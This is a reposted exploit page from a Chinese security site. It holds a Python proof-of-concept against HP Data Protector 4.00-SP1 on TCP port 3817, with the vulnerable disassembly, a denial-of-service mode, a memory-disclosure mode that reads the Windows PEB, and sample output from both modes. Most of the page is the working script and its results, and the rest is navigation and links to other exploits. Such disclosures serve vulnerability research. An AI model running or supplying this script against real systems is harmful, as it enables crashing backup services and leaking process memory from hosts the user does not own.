首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit 来源：www.vfcocus.net 作者：Nibin 发布时间：2009-06-24   #!/usr/bin/env python #POC Memory disclosure/ Denial Of Service #HP Data protector 4.00-sp1 43064 #Tested for Windows Version Only ''' Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80 100DDE89   8B15 54A72210    MOV EDX,DWORD PTR DS:[1022A754]  100DDE8F   8B82 98650000    MOV EAX,DWORD PTR DS:[EDX+6598] 100DDE95   8B4C24 54        MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data 100DDE99   8D1481           LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset         100DDE9C   8B3495 F0A42210  MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak      100DDEA3   83C4 1C          ADD ESP,1C 100DDEA6   897424 10        MOV DWORD PTR SS:[ESP+10],ESI ''' import socket import sys import struct import time import getopt bf = ("\x54\x84\x00\x00" +          "\x00\x00\x00\x00" +          "\x06\x00\x00\x00" +          "\x92\x00\x00\x00" +          "data") ip = '192.168.0.14' port = 3817 addr = (ip,port) mem_addr = 0x7ffdf000 #PEB for windows DEBUG = False def exploit_memory(ip_addr,read_mem):     s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)     s.connect((ip_addr,port))     reqst = bf.replace("data","A"*130)     #t = ((addr-1022AC80)/4 - 4)     t = ((read_mem-0x1022A4F0)/4 - 4)     print "0x%x" % t     reqst = reqst[0:32] + struct.pack("<L",t) +  reqst[36:]     s.send(reqst)     resp = s.recv(1000)     leak = struct.unpack("<L",resp[32:36])     #print type(leak[0])     if DEBUG:             print "Len of resp: %d" % len(resp)             for i in range(0,len(resp)):                 if i % 16 ==0:                     print                 print "0x%02x" % struct.unpack("<B",resp[i]),             print     s.close()     return leak[0] def dos_yosemite(ip_addr):     print "[*] Sending DOS Exploit."     s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)     s.connect((ip_addr,port))     reqst = bf.replace("data","A"*130)     s.send(reqst)     #resp = s.recv(1000)     s.close() def main():         try:             opt, args = getopt.getopt(sys.argv[1:],"ht:e:",["help","target=","exploit="])     if len(opt)==0: usage() sys.exit(0) except getopt.GetoptError,err:     print str(err)     usage()     sys.exit(2) for o,a in opt: if o in ("-h","--help"):       usage()       sys.exit() elif o in ("-e","--exploit"): for opt_target,arg_target in opt: if opt_target in ("-t","--target"): if int(a) == 0: # DoS                                             dos_yosemite(arg_target)                                             sys.exit(0)                                         elif int(a) == 1:                                             print "[*] Dumping Memory..{PEB}"                                                for i in range(0,int(0x50),4): #Poc to read the 80bytes from memory                                                 leak = exploit_memory(arg_target,mem_addr+i)                                                 time.sleep(0.5)                                                 print "0x%08x ---> 0x%08x" % ((mem_addr+i),leak)                                             sys.exit()                                         else:                                             print "[*] Unknown Exploit type"                                             usage()                                             sys.exit()                                 else:                                     print "[*] Target Missing"                                     usage()                                     sys.exit()                                                 else:                     continue def usage():     print "Yosemite DoS and Information Disclosure Exploit"     #print "Yosemite backup standard v8.7 build 43905 Trial"     #print "Tested for Windows Versions"     print "Available Options"     print "\t -t | --target     target address"     print "\t -e | --exploit    { 0 - Dos \ 1 - Memory Leak }"     print "\n" if __name__=='__main__':     main()     ''' C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1 [*] Dumping Memory..{PEB} 0x7ffdf000 ---> 0x0012fbc4 0x7ffdf004 ---> 0x00130000 0x7ffdf008 ---> 0x0012d000 0x7ffdf00c ---> 0x00000000 0x7ffdf010 ---> 0x00001e00 0x7ffdf014 ---> 0x00000000 0x7ffdf018 ---> 0x7ffdf000 0x7ffdf01c ---> 0x00000000 0x7ffdf020 ---> 0x00000c54 0x7ffdf024 ---> 0x00000cfc 0x7ffdf028 ---> 0x00000000 0x7ffdf02c ---> 0x00000000 0x7ffdf030 ---> 0x7ffdb000 0x7ffdf034 ---> 0x00000000 0x7ffdf038 ---> 0x00000000 0x7ffdf03c ---> 0x00000000 0x7ffdf040 ---> 0xe15b42a0 0x7ffdf044 ---> 0x00000000 0x7ffdf048 ---> 0x00000000 0x7ffdf04c ---> 0x00000000 C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0 [*] Sending DOS Exploit. '''   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Zen Cart 1.3.8 Remote SQL Exec ·HP Data Protector 4.00-SP1b430 ·Zen Cart 1.3.8 Remote Code Exe ·The Cisco ASA Web VPN versions ·linux/x86 Shellcode Polymorphi ·Bopup Communications Server 3. ·MyBB <= 1.4.6 Remote Code Exec ·Joomla Component com_pinboard ·Multiple HTTP Server Low Bandw ·AlumniServer 1.0.1 (resetpwema ·pmaPWN! - phpMyAdmin Code Inje ·Safari 3.2.3 Arbitrary Code Ex   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved